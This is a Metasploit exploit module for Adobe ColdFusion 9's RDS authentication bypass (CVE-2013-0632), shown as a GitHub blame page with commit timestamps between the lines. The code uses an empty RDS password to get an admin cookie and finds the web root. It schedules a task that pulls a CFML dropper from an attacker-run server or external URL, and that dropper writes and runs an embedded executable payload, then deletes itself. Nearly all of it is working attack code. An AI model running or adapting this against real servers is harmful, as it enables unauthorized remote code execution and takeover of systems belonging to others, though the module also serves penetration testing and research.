metasploit-framework/modules/exploits/multi/http/coldfusion_rds.rb

319 lines
9.6 KiB
Ruby
Raw Normal View History

2013-12-09 14:18:34 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2013-12-09 14:18:34 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
2013-12-09 22:10:13 +00:00
include Msf::Exploit::Remote::HttpServer::HTML
2013-12-09 14:18:34 +00:00
include Msf::Exploit::EXE
2013-12-10 15:59:36 +00:00
Rank = GreatRanking
2013-12-09 19:22:26 +00:00
2013-12-09 14:18:34 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe ColdFusion 9 Administrative Login Bypass',
'Description' => %q{
Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote
attackers to bypass authentication using the RDS component. Due to
default settings or misconfiguration, its password can be set to an
empty value. This allows an attacker to create a session via the RDS
login that can be carried over to the admin web interface even though
the passwords might be different, and therefore bypassing authentication
on the admin web interface leading to arbitrary code execution. Tested
on Windows and Linux with ColdFusion 9.
2013-12-09 14:18:34 +00:00
},
'Author' =>
[
'Scott Buckel', # Vulnerability discovery
2013-12-09 19:22:26 +00:00
'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module
2013-12-09 14:18:34 +00:00
],
'License' => MSF_LICENSE,
'References' =>
[
2013-12-10 15:59:36 +00:00
[ "CVE", "2013-0632" ],
[ "EDB", "27755" ],
[ "URL", "http://www.adobe.com/support/security/bulletins/apsb13-03.html" ]
2013-12-09 14:18:34 +00:00
],
'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive, #thanks juan!
2013-12-09 19:22:26 +00:00
'Platform' => ['win', 'linux'],
2013-12-09 14:18:34 +00:00
'Targets' =>
[
2013-12-09 19:22:26 +00:00
[ 'Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'Linux',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
2013-12-09 14:18:34 +00:00
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 08 2013'
))
register_options(
[
2013-12-09 19:22:26 +00:00
OptString.new('EXTURL', [ false, 'An alternative host to request the CFML payload from', "" ]),
2013-12-09 22:10:13 +00:00
OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),
2013-12-09 14:18:34 +00:00
], self.class)
register_advanced_options(
[
OptString.new('CFIDDIR', [ true, 'Alternative CFIDE directory', 'CFIDE'])
])
end
def check
uri = target_uri.path
#can we access the admin interface?
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
})
if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/
2014-01-21 23:14:55 +00:00
vprint_good "#{peer} - Administrator access available"
2013-12-09 14:18:34 +00:00
else
return Exploit::CheckCode::Safe
end
#is it cf9?
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'images', 'loginbackground.jpg')
})
img = Rex::Text.md5(res.body.to_s)
imghash = "596b3fc4f1a0b818979db1cf94a82220"
if img == imghash
2014-01-21 23:14:55 +00:00
vprint_good "#{peer} - ColdFusion 9 Detected"
2013-12-09 14:18:34 +00:00
else
return Exploit::CheckCode::Safe
end
#can we access the RDS component?
res = send_request_cgi({
'method' => 'POST',
2013-12-09 19:22:26 +00:00
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
2013-12-09 14:18:34 +00:00
'vars_post' => {
2013-12-09 19:22:26 +00:00
'method' => "login",
2013-12-09 14:18:34 +00:00
'adminpassword' => "",
'rdsPasswordAllowed' => "1"
}
})
if res and res.code == 200 and res.body.to_s =~ /true/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def exploit
@pl = gen_file_dropper
@payload_url = ""
2013-12-10 15:59:36 +00:00
if datastore['EXTURL'].blank?
2013-12-09 22:10:13 +00:00
begin
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
end
2013-12-10 15:59:36 +00:00
exec_payload
else
@payload_url = datastore['EXTURL']
upload_payload
exec_payload
2013-12-09 19:22:26 +00:00
end
2013-12-09 14:18:34 +00:00
end
2013-12-09 22:10:13 +00:00
def primer
@payload_url = get_uri
upload_payload
end
2013-12-09 14:18:34 +00:00
2013-12-09 22:10:13 +00:00
def on_request_uri(cli, request)
if request.uri =~ /#{get_resource}/
send_response(cli, @pl)
2013-12-09 14:18:34 +00:00
end
end
#task scheduler is pretty bad at handling binary files and likes to mess up our meterpreter :-(
#instead we use a CFML filedropper to embed our payload and execute it.
2013-12-09 19:22:26 +00:00
#this also removes the dependancy of using the probe.cfm to execute the file.
2013-12-09 14:18:34 +00:00
def gen_file_dropper
2013-12-09 19:22:26 +00:00
rand_var = rand_text_alpha(8+rand(8))
rand_file = rand_text_alpha(8+rand(8))
if datastore['TARGET'] == 0
rand_file += ".exe"
end
2013-12-09 14:18:34 +00:00
encoded_pl = Rex::Text.encode_base64(generate_payload_exe)
print_status "Building CFML shell..."
#embed payload
shell = ""
shell += " <cfset #{rand_var} = ToBinary( \"#{encoded_pl}\" ) />"
shell += " <cffile action=\"write\" output=\"##{rand_var}#\""
2013-12-09 19:22:26 +00:00
shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
#if linux set correct permissions
if datastore['TARGET'] == 1
shell += " mode = \"700\""
end
shell += "/>"
2013-12-09 14:18:34 +00:00
#clean up our evil .cfm
shell += " <cffile action=\"delete\""
shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##listlast(cgi.script_name,\"/\")#\"/>"
#execute our payload!
shell += " <cfexecute"
shell += " name = \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
shell += " arguments = \"\""
shell += " timeout = \"60\"/>"
return shell
end
2013-12-09 19:22:26 +00:00
def exec_payload
uri = target_uri.path
print_status("#{peer} - Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}")
print_status("#{peer} - Executing payload...")
2013-12-09 19:22:26 +00:00
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], @filename)
})
end
2013-12-09 14:18:34 +00:00
def upload_payload
uri = target_uri.path
@filename = rand_text_alpha(8+rand(8)) + ".cfm" #numbers is a bad idea
taskname = rand_text_alpha(8+rand(8)) #numbers is a bad idea
print_status "#{peer} - Trying to upload payload via scheduled task..."
res = send_request_cgi({
'method' => 'POST',
2013-12-09 19:22:26 +00:00
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
2013-12-09 14:18:34 +00:00
'vars_post' => {
2013-12-09 19:22:26 +00:00
'method' => "login",
2013-12-09 14:18:34 +00:00
'adminpassword' => "",
'rdsPasswordAllowed' => "1"
}
})
2013-12-09 23:45:34 +00:00
unless res and res.code == 200
2013-12-09 19:22:26 +00:00
fail_with(Failure::Unknown, "#{peer} - RDS component was unreachable")
end
2013-12-09 14:18:34 +00:00
#deal with annoying cookie data prepending (sunglasses)
cookie = res.get_cookies
if res and res.code == 200 and cookie =~ /CFAUTHORIZATION_cfadmin=;(.*)/
cookie = $1
else
fail_with(Failure::Unknown, "#{peer} - Unable to get auth cookie")
end
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
'cookie' => cookie
})
2013-12-10 15:59:36 +00:00
if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/
print_good("#{peer} - Logged in as Administrator!")
2013-12-09 14:18:34 +00:00
else
2013-12-10 15:59:36 +00:00
fail_with(Failure::Unknown, "#{peer} - Login Failed")
2013-12-09 14:18:34 +00:00
end
#get file path gogo
res = send_request_cgi({
'method' => 'GET',
2013-12-09 19:22:26 +00:00
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'settings', 'mappings.cfm'),
'vars_get' => {
'name' => "/CFIDE"
},
2013-12-09 14:18:34 +00:00
'cookie' => cookie
})
2013-12-09 23:45:34 +00:00
unless res and res.code == 200
2013-12-09 19:22:26 +00:00
fail_with(Failure::Unknown, "#{peer} - Mappings URL was unreachable")
end
2013-12-09 14:18:34 +00:00
if res.body =~ /<input type="text" maxlength="550" name="directoryPath" value="(.*)" size="40" id="dirpath">/
file_path = $1
2013-12-10 15:59:36 +00:00
print_good("#{peer} - File path disclosed! #{file_path}")
2013-12-09 14:18:34 +00:00
else
fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")
end
2013-12-09 19:22:26 +00:00
print_status("#{peer} - Adding scheduled task")
2013-12-09 14:18:34 +00:00
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduleedit.cfm'),
'vars_post' => {
'TaskName' => taskname,
'Start_Date' => "Nov 1, 2420",
'End_Date' => "",
'Interval' => "",
'ScheduleType' => "Once",
'Operation' => "HTTPRequest",
'ScheduledURL' => @payload_url,
'publish' => "1",
'publish_file' => "#{file_path}\\#{@filename}",
'adminsubmit' => "Submit"
},
'cookie' => cookie
})
unless res and res.code == 200 or res.code == 302 #302s can happen but it still works, http black magic!
fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
end
2013-12-09 19:22:26 +00:00
print_status("#{peer} - Running scheduled task")
2013-12-09 14:18:34 +00:00
res = send_request_cgi({
'method' => 'GET',
2013-12-09 19:22:26 +00:00
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
'vars_get' => {
'runtask' => taskname,
'timeout' => "0"
},
2013-12-09 14:18:34 +00:00
'cookie' => cookie
})
if res and res.code == 200 and res.body.to_s =~ /This scheduled task was completed successfully/
2013-12-10 15:59:36 +00:00
print_good("#{peer} - Scheduled task completed successfully")
2013-12-09 14:18:34 +00:00
else
fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
end
2013-12-09 19:22:26 +00:00
print_status("#{peer} - Deleting scheduled task")
2013-12-09 14:18:34 +00:00
res = send_request_cgi({
'method' => 'GET',
2013-12-09 19:22:26 +00:00
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
'vars_get' => {
'action' => "delete",
'task' => taskname
},
2013-12-09 14:18:34 +00:00
'cookie' => cookie
})
unless res and res.code == 200
print_error("#{peer} - Scheduled task deletion failed, cleanup might be needed!")
end
end
end